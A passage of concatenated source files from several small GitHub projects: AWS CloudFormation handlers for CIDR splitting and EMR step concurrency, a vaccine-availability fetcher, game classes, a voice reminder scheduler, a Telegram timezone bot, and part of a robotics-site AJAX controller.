{
"source": "joseph-behrens/cfn-resource-cidr-helper",
"score": 2
}
#### File: src/jb_vpc_cidrcalc/handlers.py
```python
import logging
import ipaddress
import uuid
import boto3
import netaddr
from botocore.exceptions import ClientError
from typing import Any, MutableMapping, Optional
from cloudformation_cli_python_lib import (
Action,
HandlerErrorCode,
OperationStatus,
ProgressEvent,
Resource,
SessionProxy,
exceptions,
)
from .models import ResourceHandlerRequest, ResourceModel
# Use this logger to forward log messages to CloudWatch Logs.
LOG = logging.getLogger(__name__)
TYPE_NAME = "JB::VPC::CidrCalc"
resource = Resource(TYPE_NAME, ResourceModel)
test_entrypoint = resource.test_entrypoint
class Lister:
def split_by_host_numbers(self, starting_cidr, list_of_num_hosts):
cidr_list = []
for num_hosts in list_of_num_hosts:
next_cidr = CIDR(ipaddress.IPv4Network(
starting_cidr)[0], num_hosts).get_cidr()
cidr_list.append(str(next_cidr))
starting_cidr = ipaddress.IPv4Network(next_cidr)[-1] + 1
return cidr_list
def split_by_prefix(self, cidr_to_split, prefix):
cidr_list = CIDR(cidr_to_split, 0).split_by_prefix(
cidr_to_split, prefix)
return cidr_list
class CIDR:
def __init__(self, starting_address, number_of_hosts):
self.starting_address = starting_address
self.number_of_hosts = number_of_hosts
self.map = {
16: 28,
32: 27,
64: 26,
128: 25,
256: 24,
512: 23,
1000: 22,
2000: 21,
4000: 20,
8000: 19,
16000: 18,
32000: 17,
64000: 16
}
def _find_closest(self, num):
list_of_host_nums = list(self.map.keys())
closest = min(list_of_host_nums, key=lambda x: abs(x-num))
if closest < num:
try:
closest = list_of_host_nums[list_of_host_nums.index(
closest) + 1]
except IndexError:
raise ValueError(
f"Subnets must be in range of 16 to 64,000 hosts, {num} is outside the upper bound")
return closest
def _get_starting_cidr(self):
suffix = self.map[self._find_closest(self.number_of_hosts)]
return ipaddress.ip_network(str(self.starting_address) + '/' + str(suffix), False)
def get_cidr(self):
starting = self._get_starting_cidr()
if starting[0] < ipaddress.ip_address(self.starting_address):
return str(netaddr.IPNetwork(str(starting)).next())
return str(starting)
def split_by_prefix(self, cidr_to_split, new_prefix):
starting = ipaddress.ip_network(cidr_to_split, False)
cidrs = starting.subnets(new_prefix=new_prefix)
return [str(address) for address in cidrs]
def set_cidr_list(model):
if model.HostCounts:
if not isinstance(model.HostCounts, list) or not all(isinstance(item, int) for item in model.HostCounts):
raise exceptions.InvalidRequest(
f"Host number list must be an array of integers, received {model.HostCounts}")
try:
cidr_list = Lister().split_by_host_numbers(
model.CidrToSplit, model.HostCounts)
except ValueError as value_error:
raise exceptions.InvalidRequest(str(value_error))
elif model.PrefixForEvenSplit:
cidr_list = Lister().split_by_prefix(model.CidrToSplit, model.PrefixForEvenSplit)
else:
        raise exceptions.InvalidRequest(
            "Must pass either a host count list or a prefix to split the CIDR by")
return cidr_list
def write_ssm_parameters(name, value, param_type, session):
try:
ssm = session.client('ssm')
ssm.put_parameter(
Name=name,
Value=value,
Type=param_type,
Overwrite=True
)
except ClientError as client_error:
raise exceptions.InternalFailure(str(client_error))
def get_ssm_parameter(name, session):
try:
ssm = session.client('ssm')
response = ssm.get_parameter(Name=name)
return response['Parameter']['Value']
except ClientError:
raise exceptions.NotFound(TYPE_NAME, name)
def remove_ssm_parameter(name, session):
try:
ssm = session.client('ssm')
ssm.delete_parameter(Name=name)
except ClientError as client_error:
raise exceptions.InternalFailure(str(client_error))
@resource.handler(Action.CREATE)
def create_handler(
session: Optional[SessionProxy],
request: ResourceHandlerRequest,
callback_context: MutableMapping[str, Any],
) -> ProgressEvent:
model = request.desiredResourceState
progress: ProgressEvent = ProgressEvent(
status=OperationStatus.IN_PROGRESS,
resourceModel=model,
)
model.UID = str(uuid.uuid4())
model.CIDRs = ','.join(set_cidr_list(model))
write_ssm_parameters(model.UID + '-CidrList',
model.CIDRs, 'StringList', session)
write_ssm_parameters(model.UID + '-State', 'CREATED', 'String', session)
progress.status = OperationStatus.SUCCESS
return progress
@resource.handler(Action.UPDATE)
def update_handler(
session: Optional[SessionProxy],
request: ResourceHandlerRequest,
callback_context: MutableMapping[str, Any],
) -> ProgressEvent:
model = request.desiredResourceState
progress: ProgressEvent = ProgressEvent(
status=OperationStatus.IN_PROGRESS,
resourceModel=model,
)
if not model.UID:
raise exceptions.NotFound(TYPE_NAME, 'UID')
state = get_ssm_parameter(model.UID + '-State', session)
if state == 'DELETED':
raise exceptions.NotFound(TYPE_NAME, 'UID')
model.CIDRs = ','.join(set_cidr_list(model))
write_ssm_parameters(model.UID + '-CidrList',
model.CIDRs, 'StringList', session)
write_ssm_parameters(model.UID + '-State', 'UPDATED', 'String', session)
progress.status = OperationStatus.SUCCESS
return progress
@resource.handler(Action.DELETE)
def delete_handler(
session: Optional[SessionProxy],
request: ResourceHandlerRequest,
callback_context: MutableMapping[str, Any],
) -> ProgressEvent:
model = request.desiredResourceState
progress: ProgressEvent = ProgressEvent(
status=OperationStatus.IN_PROGRESS,
resourceModel=model,
)
    if not model.UID:
        raise exceptions.NotFound(TYPE_NAME, 'UID')
    state = get_ssm_parameter(model.UID + '-State', session)
    if state == 'DELETED':
        raise exceptions.NotFound(TYPE_NAME, 'UID')
elif state == 'CREATED' or state == 'UPDATED':
remove_ssm_parameter(model.UID + '-CidrList', session)
write_ssm_parameters(model.UID + '-State',
'DELETED', 'String', session)
return ProgressEvent(
status=OperationStatus.SUCCESS,
resourceModel=None,
)
else:
raise exceptions.NotFound(TYPE_NAME, state)
@resource.handler(Action.READ)
def read_handler(
session: Optional[SessionProxy],
request: ResourceHandlerRequest,
callback_context: MutableMapping[str, Any],
) -> ProgressEvent:
    model = request.desiredResourceState
    if not model.UID:
        raise exceptions.NotFound(TYPE_NAME, 'UID')
    if get_ssm_parameter(model.UID + '-State', session) == 'DELETED':
raise exceptions.NotFound(TYPE_NAME, 'UID')
model.CIDRs = get_ssm_parameter(
model.UID + '-CidrList', session)
return ProgressEvent(
status=OperationStatus.SUCCESS,
resourceModel=model,
)
```
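Outside the CloudFormation contract, the SSM round-trip these handlers rely on can be exercised directly with boto3. A minimal sketch, assuming configured AWS credentials and region; the parameter name and values are illustrative:

```python
import uuid
import boto3

ssm = boto3.client('ssm')
uid = str(uuid.uuid4())

# Persist a calculated CIDR list the same way create_handler does.
ssm.put_parameter(Name=uid + '-CidrList', Value='10.0.0.0/26,10.0.0.64/26',
                  Type='StringList', Overwrite=True)

# Read it back, mirroring get_ssm_parameter.
value = ssm.get_parameter(Name=uid + '-CidrList')['Parameter']['Value']
print(value.split(','))

# Clean up, mirroring remove_ssm_parameter.
ssm.delete_parameter(Name=uid + '-CidrList')
```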
#### File: cfn-resource-cidr-helper/tests/unit_tests.py
```python
import unittest
from jb_vpc_cidrcalc.handlers import CIDR
from jb_vpc_cidrcalc.handlers import Lister
cidr_maps = {
16: 28,
32: 27,
64: 26,
128: 25,
256: 24,
512: 23,
1000: 22,
2000: 21,
4000: 20,
8000: 19,
16000: 18,
32000: 17,
64000: 16
}
class CalculatorTests(unittest.TestCase):
def test_instantiation(self):
cidr = CIDR('10.0.0.0', 22)
self.assertEqual(cidr.number_of_hosts, 22)
self.assertEqual(cidr.starting_address, '10.0.0.0')
self.assertDictEqual(cidr_maps, cidr.map)
def test_next_cidr(self):
cidr = CIDR('10.0.0.0', 250)
next_cidr = cidr.get_cidr()
self.assertEqual(next_cidr, '10.0.0.0/24')
def test_out_of_range(self):
with self.assertRaises(ValueError):
cidr = CIDR('10.0.0.0', 64001)
cidr.get_cidr()
def test_split_by_prefix(self):
cidr = CIDR(None, None)
expected_list = ['10.0.0.0/26', '10.0.0.64/26',
'10.0.0.128/26', '10.0.0.192/26']
self.assertEqual(cidr.split_by_prefix(
'10.0.0.0/24', 26), expected_list)
class GeneratorTests(unittest.TestCase):
def test_split_by_hosts(self):
cidrs = Lister().split_by_host_numbers(
'10.0.0.0', [64, 128, 64, 250, 500])
expected_list = ['10.0.0.0/26', '10.0.0.128/25',
'10.0.1.0/26', '10.0.2.0/24', '10.0.4.0/23']
self.assertEqual(cidrs, expected_list)
def test_split_by_prefix(self):
cidrs = Lister().split_by_prefix('10.0.0.0/24', 26)
expected_list = ['10.0.0.0/26', '10.0.0.64/26',
'10.0.0.128/26', '10.0.0.192/26']
self.assertEqual(cidrs, expected_list)
def test_out_of_range(self):
with self.assertRaises(ValueError):
cidrs = Lister().split_by_host_numbers(
'10.0.0.0', [64, 128, 64, 250, 500000])
if __name__ == "__main__":
unittest.main()
```
{
"source": "joseph-behrens/cfn-resource-type-emr-stepconcurrency",
"score": 2
}
#### File: src/jb_emr_stepconcurrencylevel/handlers.py
```python
import logging
from typing import Any, MutableMapping, Optional
from cloudformation_cli_python_lib import (
Action,
HandlerErrorCode,
OperationStatus,
ProgressEvent,
Resource,
SessionProxy,
exceptions,
)
from .models import ResourceHandlerRequest, ResourceModel
# Use this logger to forward log messages to CloudWatch Logs.
LOG = logging.getLogger(__name__)
LOG.setLevel("INFO")
TYPE_NAME = "JB::EMR::StepConcurrencyLevel"
resource = Resource(TYPE_NAME, ResourceModel) # pylint: disable=invalid-name
test_entrypoint = resource.test_entrypoint # pylint: disable=invalid-name
def get_cluster_info(session: Optional[SessionProxy], cluster_id: str) -> dict:
"""This function will gather all information from a describe cluster
call to the given cluster ID
Attributes:
session (Optional[SessionProxy]): The session proxy for connecting
to the needed AWS API client
cluster_id (str): The unique ID of the cluster to get details from
Returns:
dict: A dictionary of the cluster attributes
"""
client = session.client('emr')
LOG.info("Getting all info for cluster %s", cluster_id)
response = client.describe_cluster(
ClusterId=cluster_id
)
LOG.info("RESPONSE: %s", response)
return response
def get_uid(session: Optional[SessionProxy], cluster_id: str) -> str:
"""This function will retreive the value of the tag "StepConcurrencyUID"
from the given cluster ID
Attributes:
session (Optional[SessionProxy]): The session proxy for connecting
to the needed AWS API client
cluster_id (str): The unique ID of the cluster to get details from
Returns:
str: The value of the StepConcurrencyUID tag in the cluster
"""
response = get_cluster_info(session, cluster_id)
LOG.info("Gathering tags for cluster %s", cluster_id)
tags = response["Cluster"]["Tags"]
LOG.info(tags)
for tag in tags:
if tag['Key'] == "StepConcurrencyUID":
LOG.info("Found concurrency tag")
LOG.info(tag["Value"])
return tag["Value"]
LOG.info("Didn't find concurrency tag")
return None
def get_concurrency_level(session: Optional[SessionProxy], cluster_id: str) -> str:
"""This function will retreive the current value of StepConcurrencyLevel
from the given cluster
Attributes:
session (Optional[SessionProxy]): The session proxy for connecting
to the needed AWS API client
cluster_id (str): The unique ID of the cluster to get details from
Returns:
str: The value of the StepConcurrencyLevel attribute in the cluster
"""
response = get_cluster_info(session, cluster_id)
LOG.info("Gathering concurrency for cluster %s", cluster_id)
return response["Cluster"]["StepConcurrencyLevel"]
@resource.handler(Action.CREATE)
def create_handler(
session: Optional[SessionProxy],
request: ResourceHandlerRequest,
callback_context: MutableMapping[str, Any], # pylint: disable=unused-argument
) -> ProgressEvent:
"""This function is triggered by the CloudFormation CREATE event
and will set the StepConcurrency level from the default of 1
to the new provided value within the up to the max of 256. It
will also add a tag to the cluster in order to keep track of
the resource.
Attributes:
session (Optional[SessionProxy]): The session proxy for connecting
to the needed AWS API client
        request (ResourceHandlerRequest): The request carrying the desired resource state
callback_context (MutableMapping[str, Any]): Use to store any state
between re-invocation via IN_PROGRESS
Returns:
ProgressEvent: An event with the status of the action
"""
LOG.info("Create Handler")
model = request.desiredResourceState
progress: ProgressEvent = ProgressEvent(
status=OperationStatus.IN_PROGRESS,
resourceModel=model,
)
model.UID = "cluster:" + model.ClusterId
model.StepConcurrencyLevel = int(model.StepConcurrencyLevel)
uid = get_uid(session, model.ClusterId)
LOG.info("UID: %s", uid)
if uid == model.UID:
raise exceptions.AlreadyExists(TYPE_NAME, model.ClusterId)
if model.StepConcurrencyLevel < 1 or model.StepConcurrencyLevel > 256:
raise exceptions.InvalidRequest(
f"Step Concurency Level must be between 1 and 256, \
{model.StepConcurrencyLevel} was given.")
try:
client = session.client('emr')
LOG.info("Setting concurrency to %s for cluster %s",
model.StepConcurrencyLevel, model.ClusterId)
response = client.modify_cluster(
ClusterId=model.ClusterId,
StepConcurrencyLevel=int(model.StepConcurrencyLevel)
)
LOG.info("RESPONSE TO SET CONCURRENCY:")
LOG.info(response)
LOG.info("Setting UID tag to %s", model.ClusterId)
tag_response = client.add_tags(
ResourceId=model.ClusterId,
Tags=[
{
"Key": "StepConcurrencyUID",
"Value": model.UID
}
]
)
LOG.info("RESPONSE TO ADD TAGS:")
LOG.info(tag_response)
progress.status = OperationStatus.SUCCESS
except Exception as unexpected_exception:
LOG.error(str(unexpected_exception))
raise exceptions.InternalFailure(
f"Failed Create: {str(unexpected_exception)}")
return progress
@resource.handler(Action.UPDATE)
def update_handler(
session: Optional[SessionProxy],
request: ResourceHandlerRequest,
callback_context: MutableMapping[str, Any], # pylint: disable=unused-argument
) -> ProgressEvent:
"""This function is triggered by the CloudFormation UPDATE event
and will update the StepConcurrency level to the new provided
value within the up to the max of 256. It will also add a tag to
the cluster in order to keep track of the resource.
Attributes:
session (Optional[SessionProxy]): The session proxy for connecting
to the needed AWS API client
        request (ResourceHandlerRequest): The request carrying the desired resource state
callback_context (MutableMapping[str, Any]): Use to store any state
between re-invocation via IN_PROGRESS
Returns:
ProgressEvent: An event with the status of the action
"""
model = request.desiredResourceState
previous_model = request.previousResourceState
progress: ProgressEvent = ProgressEvent(
status=OperationStatus.IN_PROGRESS,
resourceModel=model,
)
LOG.info("UPDATE HANDLER")
LOG.info("MODEL")
LOG.info(model)
LOG.info("PREVIOUS")
LOG.info(previous_model)
model.StepConcurrencyLevel = int(model.StepConcurrencyLevel)
if model.UID != previous_model.UID:
raise exceptions.InvalidRequest("Cannot update the UID")
if model.StepConcurrencyLevel < 1 or model.StepConcurrencyLevel > 256:
raise exceptions.InvalidRequest(
f"Step Concurency Level must be between 1 and 256, \
{model.StepConcurrencyLevel} was given.")
if model.UID != get_uid(session, model.ClusterId):
raise exceptions.NotFound(TYPE_NAME, model.ClusterId)
try:
client = session.client('emr')
LOG.info("Updating concurrency to %s for cluster %s",
model.StepConcurrencyLevel, model.ClusterId)
response = client.modify_cluster(
ClusterId=model.ClusterId,
StepConcurrencyLevel=model.StepConcurrencyLevel
)
LOG.info("RESPONSE: %s", response)
progress.status = OperationStatus.SUCCESS
except Exception as unexpected_exception:
LOG.error(str(unexpected_exception))
raise exceptions.InternalFailure(
f"Failed Update: {str(unexpected_exception)}")
return progress
@resource.handler(Action.DELETE)
def delete_handler(
session: Optional[SessionProxy],
request: ResourceHandlerRequest,
callback_context: MutableMapping[str, Any], # pylint: disable=unused-argument
) -> ProgressEvent:
"""This function is triggered by the CloudFormation DELETE event
and will set the StepConcurrency level to the default of 1.
It will also remove a tag on the cluster in order to keep track of
the resource.
Attributes:
session (Optional[SessionProxy]): The session proxy for connecting
to the needed AWS API client
        request (ResourceHandlerRequest): The request carrying the desired resource state
callback_context (MutableMapping[str, Any]): Use to store any state
between re-invocation via IN_PROGRESS
Returns:
ProgressEvent: An event with the status of the action
"""
model = request.desiredResourceState
progress: ProgressEvent = ProgressEvent(
status=OperationStatus.IN_PROGRESS,
resourceModel=model,
)
LOG.info("DELETE HANDLER")
if get_uid(session, model.ClusterId) != model.UID:
raise exceptions.NotFound(TYPE_NAME, model.ClusterId)
try:
client = session.client('emr')
LOG.info("Setting concurrency to default for cluster %s",
model.ClusterId)
response = client.modify_cluster(
ClusterId=model.ClusterId,
StepConcurrencyLevel=1
)
LOG.info("RESPONSE:")
LOG.info("RESPONSE:")
LOG.info(response)
progress.resourceModel = None
LOG.info("Removing Tags")
tags_response = client.remove_tags(
ResourceId=model.ClusterId,
TagKeys=["StepConcurrencyUID"]
)
LOG.info("TAG REMOVAL RESPONSE")
LOG.info(tags_response)
LOG.info("TAG REMOVAL RESPONSE: %s", tags_response)
progress.status = OperationStatus.SUCCESS
except Exception as unexpected_exception:
LOG.error(str(unexpected_exception))
raise exceptions.InternalFailure(
f"Failed Delete: {str(unexpected_exception)}")
return progress
@resource.handler(Action.READ)
def read_handler(
session: Optional[SessionProxy],
request: ResourceHandlerRequest,
callback_context: MutableMapping[str, Any], # pylint: disable=unused-argument
) -> ProgressEvent:
"""This function is triggered by the CloudFormation READ event
and will retrieve the StepConcurrency level of the cluster.
Attributes:
session (Optional[SessionProxy]): The session proxy for connecting
to the needed AWS API client
        request (ResourceHandlerRequest): The request carrying the desired resource state
callback_context (MutableMapping[str, Any]): Use to store any state
between re-invocation via IN_PROGRESS
Returns:
ProgressEvent: An event with the status of the action
"""
model = request.desiredResourceState
if model.UID != get_uid(session, model.ClusterId):
raise exceptions.NotFound(TYPE_NAME, model.ClusterId)
try:
model.StepConcurrencyLevel = get_concurrency_level(
session, model.ClusterId)
except Exception as unexpected_exception:
LOG.error(str(unexpected_exception))
raise exceptions.InternalFailure(
f"Failed Read: {str(unexpected_exception)}")
return ProgressEvent(
status=OperationStatus.SUCCESS,
resourceModel=model,
)
```
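The ownership check and concurrency update these handlers perform can be reproduced with plain boto3 outside CloudFormation. A hedged sketch; `j-XXXXXXXXXXXXX` is a placeholder cluster ID and credentials are assumed:

```python
import boto3

emr = boto3.client('emr')
cluster_id = 'j-XXXXXXXXXXXXX'  # placeholder, not a real cluster

# Find the StepConcurrencyUID tag, as get_uid() does.
cluster = emr.describe_cluster(ClusterId=cluster_id)['Cluster']
uid = next((t['Value'] for t in cluster['Tags']
            if t['Key'] == 'StepConcurrencyUID'), None)
print('UID tag:', uid, '| concurrency:', cluster['StepConcurrencyLevel'])

# Raise the concurrency level, as create_handler/update_handler do.
emr.modify_cluster(ClusterId=cluster_id, StepConcurrencyLevel=4)
```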
{
"source": "joseph-behrens/vaccine-availability-notifications",
"score": 3
}
#### File: chalicelib/services/vaccinespotter_service.py
```python
from typing import Optional
import requests
from requests import HTTPError, Timeout
from chalicelib.logs.utils import get_logger
logger = get_logger(__name__)
def fetch_availability_for_state(state_abbr: str) -> Optional[dict]:
"""
Retrieves the vaccine availability for a given state
"""
logger.info(
"Retrieving vaccine availability for state",
extra={"state": state_abbr},
)
    try:
        response = requests.get(
            f"https://www.vaccinespotter.org/api/v0/states/{state_abbr}.json",
            timeout=10,
        )
        # requests raises HTTPError only from raise_for_status(); without this
        # call the HTTPError branch below would never trigger.
        response.raise_for_status()
except (HTTPError, Timeout) as e:
logger.error(
"Failed to process state availability",
extra={"exception": e, "state": state_abbr},
)
return None
return response.json()
```
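A usage sketch of the service; note the `features`/`appointments_available` fields are assumptions about the vaccinespotter GeoJSON payload, not something this module guarantees:

```python
availability = fetch_availability_for_state("NY")
if availability is not None:
    # Assumed GeoJSON shape: a top-level "features" list of sites.
    open_sites = [f for f in availability.get("features", [])
                  if f.get("properties", {}).get("appointments_available")]
    print(f"{len(open_sites)} sites currently report open appointments")
```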
{
"source": "JosephBerman/DungeonPi",
"score": 3
}
#### File: src/characterClass/CharacterClass.py
```python
from src.Constants import *
CONSTANT = Constants()
class CharacterClass:
def __init__(self, nm: str, ht: int, ba: int):
self._name = nm
self._baseHealth = ht
self._baseArmor = ba
def printClass(self):
print(self._name, self._baseHealth, self._baseArmor)
def getName(self):
return self._name
def getHealth(self):
return self._baseHealth
def getBaseArmor(self):
return self._baseArmor
class EmptyClass(CharacterClass):
def __init__(self):
super().__init__(CONSTANT.NONE, 0, 0)
```
#### File: src/characterClass/ProtagonistClasses.py
```python
from .CharacterClass import CharacterClass
class Wizard(CharacterClass):
def __init__(self):
super().__init__("Wizard", 6, 10)
self._mana = 10
class Monk(CharacterClass):
def __init__(self):
super().__init__("Monk", 6, 14)
self._ki = 3
class Barbarian(CharacterClass):
def __init__(self):
super().__init__("Barbarian", 12, 10)
class Archer(CharacterClass):
def __init__(self):
super().__init__("Archer", 8, 10)
```
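A minimal usage sketch, assuming the repo root is on `sys.path` so the `src` package imports resolve:

```python
from src.characterClass.ProtagonistClasses import Wizard, Barbarian

party = [Wizard(), Barbarian()]
for member in party:
    member.printClass()              # e.g. "Wizard 6 10"
    assert member.getHealth() > 0    # every class carries base stats
```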
{
"source": "JosephBGerber/snips-scheduler",
"score": 2
}
#### File: JosephBGerber/snips-scheduler/action-scheduler.py
```python
import time
import threading
from hermes_python.hermes import Hermes, IntentMessage
from hermes_python.ffi.utils import MqttOptions
import db
def set_reminder_callback(hermes, intent_message):
# type: (Hermes, IntentMessage) -> None
handle = db.Database()
event_time_str = intent_message.slots["time"].first().value[:-7] # remove timezone information for the time value
event_time_struct = time.strptime(event_time_str, "%Y-%m-%d %H:%M:%S") # parse the str time into a time.time_struct
event_time = time.mktime(event_time_struct) # store the resulting epoch time
if len(intent_message.slots) == 1:
uuid = handle.create_event(event_time)
message = "Reminder created at %I %M %p with an I D of {}".format(uuid)
message = time.strftime(message, event_time_struct)
hermes.publish_end_session(intent_message.session_id, message)
return
    if len(intent_message.slots) == 2:
        event = intent_message.slots["event"].first().value
        # The event name was parsed but never stored; assuming db.Database
        # .create_event accepts an optional name (get_due_events() returns
        # (uuid, name) pairs, so names must be persisted somewhere).
        uuid = handle.create_event(event_time, event)
message = "Reminder created to {} at %I %M %p with an I D of {}".format(
event,
uuid)
message = time.strftime(message, event_time_struct)
hermes.publish_end_session(intent_message.session_id, message)
return
def delete_reminder_callback(hermes, intent_message):
# type: (Hermes, IntentMessage) -> None
uuid = intent_message.slots["uuid"].first().value
handle = db.Database()
handle.delete_event(uuid)
message = "Reminder with I D {} deleted".format(uuid)
hermes.publish_end_session(intent_message.session_id, message)
def event_thread(hermes):
# type: (Hermes) -> None
handle = db.Database()
while True:
time.sleep(1)
for (uuid, name) in handle.get_due_events():
if name is None:
hermes.publish_start_session_notification("default", "This is a reminder to do your stuff.", None)
handle.delete_event(uuid)
else:
message = "This is a reminder to {}".format(name)
hermes.publish_start_session_notification("default", message, None)
handle.delete_event(uuid)
if __name__ == "__main__":
mqtt_opts = MqttOptions()
with Hermes(mqtt_options=mqtt_opts) as h:
threading.Thread(target=event_thread, args=(h,)).start()
h.subscribe_intent("JosephBGerber:SetReminder", set_reminder_callback)\
.subscribe_intent("JosephBGerber:DeleteReminder", delete_reminder_callback)\
.start()
```
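The callbacks build their replies in two stages: `str.format` interpolates the UUID first, then `time.strftime` expands the remaining `%I %M %p` fields against the parsed time. A standalone demonstration of that templating trick:

```python
import time

event_time_struct = time.strptime("2021-05-01 14:30:00", "%Y-%m-%d %H:%M:%S")
message = "Reminder created at %I %M %p with an I D of {}".format(42)
print(time.strftime(message, event_time_struct))
# -> Reminder created at 02 30 PM with an I D of 42
```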
{
"source": "josephbirkner/telegram-timezone-bot",
"score": 2
}
#### File: josephbirkner/telegram-timezone-bot/main.py
```python
import logging
import sys
from telegram.ext import Updater, MessageHandler, Filters
from datetime import datetime
from pytz import all_timezones_set, timezone, utc
import re
from os.path import join, dirname, abspath
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO)
OFFLINE = len(sys.argv) > 1 and sys.argv[1] == "offline"
FREEDOM_TIMEZONES = {"edt", "est", "pst", "pdt"}
ALL_TIMEZONES = {tz.lower() for tz in all_timezones_set} | FREEDOM_TIMEZONES
query_re = re.compile(
f"(?:[^\\d]+|\\d[^\\d:])*\\b(\\d{{1,2}})(?::(\\d{{1,2}}))?\\s*(am|pm)?\\s*({'|'.join(ALL_TIMEZONES)})?\\s+(?:(in|to)\\s+)?({'|'.join(ALL_TIMEZONES)})\\b.*"
)
def make_timezone(name: str) -> timezone:
if name == "edt" or name == "est":
tz = timezone("US/Eastern")
elif name == "cest":
tz = timezone("CET")
elif name == "pdt" or name == "pst":
tz = timezone("US/Pacific")
else:
tz = timezone(name.upper())
return tz
def make_time(name: str, hour: int, minute: int) -> datetime:
now = utc.localize(datetime.now())
return make_timezone(name).localize(datetime(
year=now.year,
month=now.month,
day=now.day,
hour=hour,
minute=minute),
is_dst=True)
def make_response(user_input: str):
match = query_re.match(user_input)
if not match:
return
try:
src_hour = int(match.group(1) or "0")
src_min = int(match.group(2) or "0")
src_pm = match.group(3)
src_tz = match.group(4)
src_separator = match.group(5)
dest_tz = match.group(6)
# Default src/dst timezone
if not src_tz and not src_separator:
src_tz = dest_tz
dest_tz = "cet" if src_tz in FREEDOM_TIMEZONES else "est"
elif not src_tz:
src_tz = "cet" if dest_tz in FREEDOM_TIMEZONES else "est"
        # AM/PM conversions: "12 am" is midnight (0), "12 pm" stays noon (12).
        if src_pm == "pm" and src_hour < 12:
            src_hour += 12
        elif src_pm == "am" and src_hour == 12:
            src_hour = 0
orig_time = make_time(src_tz, src_hour, src_min)
result_time = orig_time.astimezone(make_timezone(dest_tz))
response = result_time.strftime('%H:%M %Z')
if response:
            if dest_tz in FREEDOM_TIMEZONES:
                return f"That's {response} 🇺🇸🇺🇸"
            else:
                return f"That's {response} 🇪🇺"
    except Exception as e:
        return f"Whatevs ({e})"
if not OFFLINE:
def process_message(update, context):
msg = update.message.text.lower()
response = make_response(msg)
if response:
context.bot.send_message(chat_id=update.effective_chat.id, text=response)
with open(join(abspath(dirname(__file__)), "token"), "r") as token_file:
token = token_file.read()
updater = Updater(token=token, use_context=True)
message_handler = MessageHandler(Filters.text & (~Filters.command), process_message)
updater.dispatcher.add_handler(message_handler)
updater.start_polling()
updater.idle()
else:
user_input_text = ""
while True:
user_input_text = input().lower()
if user_input_text in {"q", "exit", "quit"}:
break
print(f"> {make_response(user_input_text)}")
```
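The conversion at the heart of `make_response` is the standard pytz `localize`/`astimezone` pattern. A standalone sketch with a fixed date:

```python
from datetime import datetime
from pytz import timezone

eastern = timezone("US/Eastern")
cet = timezone("CET")

# 5:30 pm US/Eastern on 2021-06-01 (EDT, UTC-4) converted to CET (CEST, UTC+2).
orig = eastern.localize(datetime(2021, 6, 1, 17, 30), is_dst=True)
print(orig.astimezone(cet).strftime("%H:%M %Z"))  # 23:30 CEST
```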
{
"source": "josephbisch/the-blue-alliance",
"score": 2
}
#### File: the-blue-alliance/controllers/ajax_controller.py
```python
import os
import urllib2
import json
import time
from base_controller import CacheableHandler, LoggedInHandler
from google.appengine.api import memcache
from google.appengine.ext import ndb
from google.appengine.ext.webapp import template
from helpers.model_to_dict import ModelToDict
from helpers.mytba_helper import MyTBAHelper
from models.account import Account
from models.event import Event
from models.favorite import Favorite
from models.sitevar import Sitevar
from models.typeahead_entry import TypeaheadEntry
class AccountFavoritesHandler(LoggedInHandler):
"""
For getting an account's favorites
"""
def get(self, model_type):
if not self.user_bundle.user:
self.response.set_status(401)
return
favorites = Favorite.query(
Favorite.model_type==int(model_type),
ancestor=ndb.Key(Account, self.user_bundle.user.user_id())).fetch()
self.response.out.write(json.dumps([ModelToDict.favoriteConverter(fav) for fav in favorites]))
class AccountFavoritesAddHandler(LoggedInHandler):
"""
For adding an account's favorites
"""
def post(self):
if not self.user_bundle.user:
self.response.set_status(401)
return
model_type = int(self.request.get("model_type"))
model_key = self.request.get("model_key")
user_id = self.user_bundle.user.user_id()
fav = Favorite(
parent=ndb.Key(Account, user_id),
user_id=user_id,
model_key=model_key,
model_type=model_type
)
MyTBAHelper.add_favorite(fav)
class AccountFavoritesDeleteHandler(LoggedInHandler):
"""
For deleting an account's favorites
"""
def post(self):
if not self.user_bundle.user:
self.response.set_status(401)
return
model_key = self.request.get("model_key")
user_id = self.user_bundle.user.user_id()
MyTBAHelper.remove_favorite(user_id, model_key)
class LiveEventHandler(CacheableHandler):
"""
Returns the necessary details to render live components
Uses timestamp for aggressive caching
"""
CACHE_VERSION = 1
CACHE_KEY_FORMAT = "live-event:{}:{}" # (event_key, timestamp)
def __init__(self, *args, **kw):
super(LiveEventHandler, self).__init__(*args, **kw)
self._cache_expiration = 60 * 10
def get(self, event_key, timestamp):
if int(timestamp) > time.time():
self.abort(404)
self._partial_cache_key = self.CACHE_KEY_FORMAT.format(event_key, timestamp)
super(LiveEventHandler, self).get(event_key, timestamp)
def _render(self, event_key, timestamp):
self.response.headers['Cache-Control'] = 'public, max-age=%d' % self._cache_expiration
self.response.headers['Pragma'] = 'Public'
self.response.headers['content-type'] = 'application/json; charset="utf-8"'
event = Event.get_by_id(event_key)
matches = []
for match in event.matches:
matches.append({
'name': match.short_name,
'alliances': match.alliances,
'order': match.play_order,
'time_str': match.time_string,
})
event_dict = {
# 'rankings': event.rankings,
# 'matchstats': event.matchstats,
'matches': matches,
}
return json.dumps(event_dict)
class TypeaheadHandler(CacheableHandler):
"""
Currently just returns a list of all teams and events
Needs to be optimized at some point.
Tried a trie but the datastructure was too big to
fit into memcache efficiently
"""
CACHE_VERSION = 1
CACHE_KEY_FORMAT = "typeahead_entries:{}" # (search_key)
def __init__(self, *args, **kw):
super(TypeaheadHandler, self).__init__(*args, **kw)
self._cache_expiration = 60 * 60 * 24
def get(self, search_key):
search_key = urllib2.unquote(search_key)
self._partial_cache_key = self.CACHE_KEY_FORMAT.format(search_key)
super(TypeaheadHandler, self).get(search_key)
def _render(self, search_key):
self.response.headers['Cache-Control'] = 'public, max-age=%d' % self._cache_expiration
self.response.headers['Pragma'] = 'Public'
self.response.headers['content-type'] = 'application/json; charset="utf-8"'
entry = TypeaheadEntry.get_by_id(search_key)
if entry is None:
return '[]'
else:
if self._has_been_modified_since(entry.updated):
return entry.data_json
else:
return None
class WebcastHandler(CacheableHandler):
"""
Returns the HTML necessary to generate the webcast embed for a given event
"""
CACHE_VERSION = 1
CACHE_KEY_FORMAT = "webcast_{}_{}" # (event_key)
def __init__(self, *args, **kw):
super(WebcastHandler, self).__init__(*args, **kw)
self._cache_expiration = 60 * 60 * 24
def get(self, event_key, webcast_number):
self._partial_cache_key = self.CACHE_KEY_FORMAT.format(event_key, webcast_number)
super(WebcastHandler, self).get(event_key, webcast_number)
def _render(self, event_key, webcast_number):
